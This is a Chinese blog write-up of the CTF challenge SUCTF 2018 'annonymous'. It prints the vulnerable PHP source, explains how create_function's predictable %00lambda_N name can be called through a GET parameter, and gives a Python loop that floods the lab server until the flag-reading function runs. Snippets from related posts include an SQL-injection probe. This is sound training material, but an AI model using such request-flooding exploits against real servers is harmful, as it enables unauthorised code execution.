BUUCTF:[SUCTF 2018]annonymous

最新推荐文章于 2024-09-03 19:14:34 发布
最新推荐文章于 2024-09-03 19:14:34 发布
阅读量1.3k 收藏 3
点赞数 4
分类专栏: CTF_WEB_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/105225558
版权

[SUCTF 2018]annonymous
在这里插入图片描述

 <?php

$MY = create_function("","die(`cat flag.php`);");
$hash = bin2hex(openssl_random_pseudo_bytes(32));
eval("function SUCTF_$hash(){"
    ."global \$MY;"
    ."\$MY();"
    ."}");
if(isset($_GET['func_name'])){
    $_GET["func_name"]();
    die();
}
show_source(__FILE__);

create_function()函数在创建之后会生成一个函数名为:%00lambda_%d
%d是持续递增的,这里的%d会一直递增到最大长度直到结束,通过大量的请求来迫使Pre-fork模式启动
Apache启动新的线程,这样这里的%d会刷新为1,就可以预测了
写个脚本一直去刷新访问即可:

import requests
while True:
    r=requests.get('http://a10002f2-2091-47dc-9b7c-996d05cd4faa.node3.buuoj.cn/?func_name=%00lambda_1')
    if 'flag' in r.text:
        print(r.text)
        break
    print('Testing.......')

在这里插入图片描述

末 初
关注
专栏目录
LLaVA:Large Language and Vision Assistant
微风❤水墨
09-25 69
对于公式2中的训练,我们将数据组织为单轮对话,将问题和内容作为Xinstruct,将推理和答案作为Xa。我们在早期实验中对ChatGPT和GPT-4的使用进行了消融,发现GPT-4始终提供更高质量的指令跟随数据,例如空间推理。注意,论文使用的 GPT4 是 text-only 版本,而不是多模态版本 GPT-4V,所以 GPT4 并不能真正看到图片,只能假装看到了图片然后根据图片的描述生成多轮对话。以上是原理的介绍,我们应该更感兴趣的是Code,毕竟我们想在自己的数据上也生成指令微调数据。
Kotlin 学习笔记 (Classes and Objects)
arrowyi_gbd的专栏
07-21 426
Classes and ObjectsNested and Inner ClassesNested classes:Inner classesAnnonymous inner classesEnum classesEnum ConstantsObject Expressions and Declarations Nested and Inner Classes Nested classes: class Outer { private val bar: Int = 1 class Nested
AnonymousChat:匿名聊天
06-11
#AnonymousChat 基于网络的匿名聊天(HTML5 + Java) 由 ProjectM, HeXA (Yunjae Lee & Injoong Jeong) 开发 ##Dependent Java Websockets ##联系 mu29(InJung Chung) :
buu-[SUCTF 2018]annonymous
qaq517384的博客
10-25 246
打开环境就是源码 <?php $MY = create_function("","die(`cat flag.php`);"); $hash = bin2hex(openssl_random_pseudo_bytes(32)); eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();" ."}"); if(isset($_GET['func_name'])){ $_GET["func_name"]();
[SUCTF 2018]annonymous1
最新发布
alwtj的博客
09-03 519
当然还没有结束 ,尝试了几次%d=1后突然就失效了,然后就尝试%d=2又成功了,之后经过我多次的尝试当%d递增到9后他又回到了%d=1,而且每次%d的变动都是经过了几次的重复才会递增,格式为:%00lambda_%d ,而%d则是一个计数器会递增,用来记录create_function()这个函数执行了多少次.这说明这个服务器可能是一个多进程模式,每次请求都会有一个新的php环境(有限),所以%d会递增(存在规律).所以我们可以通过调用那个匿名函数(%d=1)来实现cat flag.php的操作.
BUUCTF--[SUCTF 2018]annonymous
qq_46263951的博客
07-28 311
进入页面后给出一段代码 <?php $MY = create_function("","die(`cat flag.php`);"); $hash = bin2hex(openssl_random_pseudo_bytes(32)); eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();" ."}"); if(isset($_GET['func_name'])){ $_GET["func_name"](
[SUCTF 2018]annonymous
fmyyy1的博客
05-12 431
<?php $MY = create_function("","die(`cat flag.php`);"); $hash = bin2hex(openssl_random_pseudo_bytes(32)); eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();" ."}"); if(isset($_GET['func_name'])){ $_GET["func_name"](); die(); }
KH-map:王国大厅领土地图
05-23
它提供了一个平台,让用户(如annonymous、admin等不同角色的用户)能够探索和管理虚拟领土。通过选择“KH”(即王国大厅),用户可以加载地图,并进一步通过输入区域编号来导航到特定区域,这有助于用户了解每个...
Ubuntu10.04安装配置LDAP服务器与客户端
Pc620的专栏
05-30 4519
注:以Ubuntu 10.04版本为例,LDAP服务器和客户端为同一台机器,最新openldap软件服务器端无单独的配置文件,而是将配置信息保存于数据库中。 1. LDAP服务器端安装与配置 1.1 安装LDAP服务器相关软件 sudo apt-get install slapd ldap-utils 1.2 配置LDAP服务器数据库 sudo ldapadd
[SUCTF 2018]annonymous creat_function匿名函数~~
a3320315的博客
02-13 1018
源码 <?php $MY = create_function("","die(`cat flag.php`);"); $hash = bin2hex(openssl_random_pseudo_bytes(32)); eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();" ."}"); if(isset($...
SUCTF 2018——Anonymous(php匿名函数 \x00lambda_)
weixin_30810583的博客
10-19 248
题目地址:http://45.76.173.177:23334/ 1 <?php 2 $MY = create_function("","die(`cat flag.php`);"); 3 $hash = bin2hex(openssl_random_pseudo_bytes(32)); 4 eval("function SUCTF_$hash(...
[SUCTF 2018]annonymous 真的是匿名函数么
qq_54929891的博客
05-27 476
<?php $MY = create_function("","die(`cat flag.php`);"); $hash = bin2hex(openssl_random_pseudo_bytes(32)); eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();" ."}"); if(isset($_GET['func_name'])){ $_GET["func_name"](); die(); .
2018 SUCTF cycle
ACdream
06-08 511
比赛的时候看到这个题,通过率那么高,然后密钥长度给了提示是1-50,所以猜到了是暴力,太久没做Crypto了,已经忘记了还有维吉尼亚字频统计这一说了……找到了一个好的wp贴出来:https://findneo.tech/180527suctf/#Magic...
2018 SUCTF pass
ACdream
06-07 416
思路很棒的一个题,对AES-CBC模式的攻击也不是一次两次了,其实题目也给了思路,只是自己不清楚原理,导致看不懂提示做不出来题目代码:#coding: UTF-8 import socket import flag from Crypto.Cipher import AES def padding(message): toPadByte = 16 - len(message) % 16 ...
[BUUCTF 2018]Online Tool
weixin_53150482的博客
07-12 388
[BUUCTF 2018]Online Tool
buu-[SUCTF 2018]MultiSQL
qaq517384的博客
10-23 276
打开环境,只有登录和注册界面,admin已存在,随便注册一个算了 登录后有两个选项 头像界面就是一个文件上传,象征性的传一张,得到一个文件夹,可以正常访问 用户信息界面还有url的user/user.php?id=2 很明显的sql注入(如果考点是注入的话) 看一眼题目,然后默默的吧id改成1,能看到admin但是没有用 测了一下字符型和整形注入都没回显 脚本不知道为什么没有返回值,浏览器是能成功访问的 ?id=1^(ascii(mid(user(),1,1))>0) 就手注了一下user()是
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值